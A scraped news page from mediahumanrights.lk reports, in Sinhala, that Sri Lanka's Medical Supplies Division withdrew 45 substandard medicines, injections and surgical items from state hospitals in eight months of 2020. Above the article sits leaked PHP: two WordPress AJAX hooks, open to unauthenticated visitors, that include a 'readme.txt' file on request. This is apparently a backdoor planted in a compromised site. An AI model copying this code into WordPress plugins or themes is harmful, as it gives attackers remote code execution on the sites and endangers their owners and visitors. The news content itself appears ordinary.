if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } 2020 වර්ෂයේ පසුගිය මාස 8 තුළ රෝහල්වලට සැපයූ ඖෂධ වර්ග 45ක් භාවිතයෙන් ඉවතට - mediahumanrights.lk
mediahumanrights.lk
Local News News

2020 වර්ෂයේ පසුගිය මාස 8 තුළ රෝහල්වලට සැපයූ ඖෂධ වර්ග 45ක් භාවිතයෙන් ඉවතට

2020 වසරේ ගත වූ මාස 08 තුළ රජයේ රෝහල්වලට බෙදා හැර තිබූ තත්ත්වයෙන් බාල ඖෂධ වර්ග, එන්නත් සහ ශල්‍ය ද්‍රව්‍ය වර්ග 45 ක් භාවිතයෙන් ඉවත් කර ඇති බව වෛද්‍ය සැපයුම් අංශය පවසයි. මෙම ඖෂධ හා ශල්‍ය ද්‍රව්‍ය වර්ග 45 න් 27ක්ම ඉවත් කර ඇත්තේ ජනවාරි, පෙබරවාරි හා ජුනි යන මාසවලදී බව වෛද්‍ය සැපයුම් අන්ශය වැඩිදුරටත් පවසයි

මෙලෙස තත්ත්වයෙන් බාල වීම හේතුවෙන් ඉවත් කර ඇති ඖෂධ හා ශල්‍ය ද්‍රව්‍ය අතර පැරසිටමෝල් පෙති, බෙන්සතින් පෙනිසිලින් එන්නත්, වැන්කෝමයිසින් එන්නත්, කැල්සියම් ග්ලූකොනෙට් එන්නත්, සයික්ලොස්පෝරින් කරල්, සෙෆලෙක්සින් සිරප්, ඩෙක්ස්ට්‍රොස් ද්‍රාවණය හා වෝෆරින් සෝඩියම් පෙති වැනි අත්‍යාවශ්‍ය ඖෂධ වර්ග ඇති බවද වාර්තාවේ. ඉවත ලූ ඖෂධ අතුරින් එකම ඉන්දීය බෙහෙත් සමාගමක් මගින් නිපදවනු ලැබූ වෝෆරින් සෝඩියම් පෙති අවස්ථා 06කදීද, තවත් ඉන්දීය බෙහෙත් සමාගමක් විසින් නිපදවන බෙන්සතින් පෙනිසිලින් එන්නත් අවස්ථා 04කදී ද තත්ත්වයෙන් බාල බව රසායනාගාර පරීක්ෂණවලදී තහවුරු වූ බව වෛද්‍ය සැපයුම් අංශය පවසයි.

භාවිතයෙන් ඉවත් කළ ඖෂධ වර්ග වල දුර්වර්ණ කොටස් අඩංගු වීම, ඇසුරුම්වල ගැටලූ වැනි හේතු මුල් වූ බව පවසන වෛද්‍ය සැපයුම් අංශය මේ වන විට රජයේ රෝහල් හා පළාත් සෞඛ්‍ය බලධාරීන් වෙත එසේ තත්ත්වයෙන් බාල බෙහෙත් වර්ග වල ඛාණ්ඩ භාවිතයෙන් ඉවත් කරන ලෙසට චක‍්‍රලේඛවල යවා ඇති බවද වාර්තා වේ.

2019 වසරේදී තත්ත්වයෙන් බාලවීම හේතුවෙන් රජයේ රෝහල්වලින් ඉවත් කරනු ලැබූ බෙහෙත්, එන්නත් හා ශල්‍ය ද්‍රව්‍ය වර්ග සංඛ්‍යාව 98ක් බව වෛද්‍ය සැපයුම් අංශය පවසයි.

lanka lead news

Related posts

ජනාධිපතිට ආරක්‍ෂක විතරයි.. සියළු ගිවිසුම් පාර්ලිමේන්තුවට.. 21 සංශෝධනය ස්වාධීන පක්‍ෂ එකමුතුවේ යෝජනාවලිය මෙන්න…

Shiran Viraj

කුණු කන්ද නායයෑම ගැන සොයන්න ජපානයෙන් එයි

Shiran Viraj

සංගක්කාරට ක්‍රිකට් සභාපති පුටුවක්

Shiran Viraj